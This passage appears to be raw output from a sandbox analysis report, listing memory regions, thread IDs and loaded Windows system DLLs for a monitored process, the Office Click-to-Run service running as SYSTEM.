= 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4900 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4901 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4902 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4903 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4904 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4905 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4906 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4907 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4908 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4909 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4910 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4911 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4912 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4913 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4914 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4915 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4916 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4917 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4918 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4919 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4920 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 4923 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4924 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 4925 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4926 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4927 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4928 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4929 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4930 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4931 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4932 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4933 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4934 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4935 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4936 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4937 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4938 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4939 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4940 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4941 start_va = 0x5c0000 end_va = 0x5d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Thread: id = 414 os_tid = 0x47c Thread: id = 416 os_tid = 0x484 Thread: id = 419 os_tid = 0x490 Thread: id = 420 os_tid = 0x494 Thread: id = 421 os_tid = 0x498 Thread: id = 425 os_tid = 0x4a8 Thread: id = 430 os_tid = 0x4bc Thread: id = 431 os_tid = 0x4c4 Thread: id = 433 os_tid = 0x4cc Thread: id = 434 os_tid = 0x4d0 Thread: id = 435 os_tid = 0x4d4 Thread: id = 436 os_tid = 0x4d8 Thread: id = 438 os_tid = 0x4e0 Thread: id = 440 os_tid = 0x4f4 Thread: id = 441 os_tid = 0x4f8 Thread: id = 442 os_tid = 0x4fc Thread: id = 460 os_tid = 0x554 Thread: id = 465 os_tid = 0x570 Thread: id = 499 os_tid = 0x610 Thread: id = 504 os_tid = 0x62c Thread: id = 513 os_tid = 0x64c Thread: id = 514 os_tid = 0x650 Thread: id = 515 os_tid = 0x654 Thread: id = 516 os_tid = 0x658 Thread: id = 523 os_tid = 0x674 Thread: id = 527 os_tid = 0x684 Thread: id = 528 os_tid = 0x688 Thread: id = 529 os_tid = 0x68c Thread: id = 541 os_tid = 0x6bc Process: id = "21" image_name = "officeclicktorun.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe" page_root = "0x151d2000" os_pid = "0x500" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe\" /service" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3810 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3811 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3812 start_va = 0x130000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 3813 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3814 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3815 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3816 start_va = 0x13f7a0000 end_va = 0x13fa48fff monitored = 0 entry_point = 0x13f7c2188 region_type = mapped_file name = "officeclicktorun.exe" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe") Region: id = 3817 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3818 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3819 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3820 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3822 start_va = 0x40000 end_va = 0x42fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3823 start_va = 0x390000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 3824 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3825 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3826 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3827 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3828 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3829 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3830 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3831 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3832 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3833 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3834 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3835 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3836 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3837 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3838 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3839 start_va = 0x7fefb1d0000 end_va = 0x7fefb1e6fff monitored = 0 entry_point = 0x7fefb1dc440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 3840 start_va = 0x7fefb1c0000 end_va = 0x7fefb1c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 3842 start_va = 0x7fefaa00000 end_va = 0x7fefaaf1fff monitored = 0 entry_point = 0x7fefaa09060 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll") Region: id = 3847 start_va = 0x7fefb170000 end_va = 0x7fefb172fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 3856 start_va = 0x7fefb1b0000 end_va = 0x7fefb1b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll") Region: id = 3863 start_va = 0x7fefb1a0000 end_va = 0x7fefb1a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 3870 start_va = 0x7fefb190000 end_va = 0x7fefb192fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3875 start_va = 0x7fefb180000 end_va = 0x7fefb182fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 3915 start_va = 0x7fefb160000 end_va = 0x7fefb162fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll") Region: id = 3917 start_va = 0x7fefaf00000 end_va = 0x7fefaf03fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 3921 start_va = 0x7fefaf10000 end_va = 0x7fefaf12fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 3923 start_va = 0x7fefab90000 end_va = 0x7fefab93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 3925 start_va = 0x7fefab80000 end_va = 0x7fefab83fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 3952 start_va = 0x7fefa960000 end_va = 0x7fefa9fdfff monitored = 0 entry_point = 0x7fefa9a9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 3958 start_va = 0x7fefab70000 end_va = 0x7fefab72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 3972 start_va = 0x7fefab60000 end_va = 0x7fefab64fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 3987 start_va = 0x7fefab10000 end_va = 0x7fefab14fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 3993 start_va = 0x7fefab00000 end_va = 0x7fefab02fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 4004 start_va = 0x7fefab50000 end_va = 0x7fefab52fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 4005 start_va = 0x7fefab40000 end_va = 0x7fefab42fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 4006 start_va = 0x7fefab30000 end_va = 0x7fefab32fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 4007 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4008 start_va = 0x7fefa920000 end_va = 0x7fefa952fff monitored = 0 entry_point = 0x7fefa94435c region_type = mapped_file name = "rstrtmgr.dll" filename = "\\Windows\\System32\\RstrtMgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll") Region: id = 4009 start_va = 0x7fefd360000 end_va = 0x7fefd3affff monitored = 0 entry_point = 0x7fefd3611e0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4010 start_va = 0x7fefd330000 end_va = 0x7fefd351fff monitored = 0 entry_point = 0x7fefd335d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4011 start_va = 0x7fefd960000 end_va = 0x7fefd96efff monitored = 0 entry_point = 0x7fefd961020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4012 start_va = 0x7feff8d0000 end_va = 0x7feff940fff monitored = 0 entry_point = 0x7feff8e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4013 start_va = 0x7fefd990000 end_va = 0x7fefd9cafff monitored = 0 entry_point = 0x7fefd991324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4014 start_va = 0x7fefdb20000 end_va = 0x7fefdc8cfff monitored = 0 entry_point = 0x7fefdb210b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4015 start_va = 0x7fefbb00000 end_va = 0x7fefbb10fff monitored = 0 entry_point = 0x7fefbb01070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4016 start_va = 0x7fefa8f0000 end_va = 0x7fefa919fff monitored = 0 entry_point = 0x7fefa8f5b40 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 4017 start_va = 0x7fefb3b0000 end_va = 0x7fefb3d6fff monitored = 0 entry_point = 0x7fefb3b98bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4018 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4019 start_va = 0x7fefb3a0000 end_va = 0x7fefb3aafff monitored = 0 entry_point = 0x7fefb3a1198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4020 start_va = 0x7feff880000 end_va = 0x7feff8ccfff monitored = 0 entry_point = 0x7feff881070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4021 start_va = 0x7fefa8d0000 end_va = 0x7fefa8eafff monitored = 0 entry_point = 0x7fefa8d1198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 4040 start_va = 0x7fefdd60000 end_va = 0x7fefdf36fff monitored = 0 entry_point = 0x7fefdd61010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 4041 start_va = 0x7fefda40000 end_va = 0x7fefda75fff monitored = 0 entry_point = 0x7fefda41474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4042 start_va = 0x7fefd970000 end_va = 0x7fefd989fff monitored = 0 entry_point = 0x7fefd971558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4043 start_va = 0x230000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 4044 start_va = 0x230000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 4045 start_va = 0x340000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 4046 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4047 start_va = 0x490000 end_va = 0x617fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 4048 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4049 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4050 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4051 start_va = 0x620000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4052 start_va = 0x7b0000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 4059 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4060 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 4061 start_va = 0xd0000 end_va = 0xdcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 4062 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4063 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4064 start_va = 0x870000 end_va = 0xb3efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4065 start_va = 0x7fefc3f0000 end_va = 0x7fefc5e3fff monitored = 0 entry_point = 0x7fefc57c924 region_type = mapped_file name = "comctl32.dll" filename = 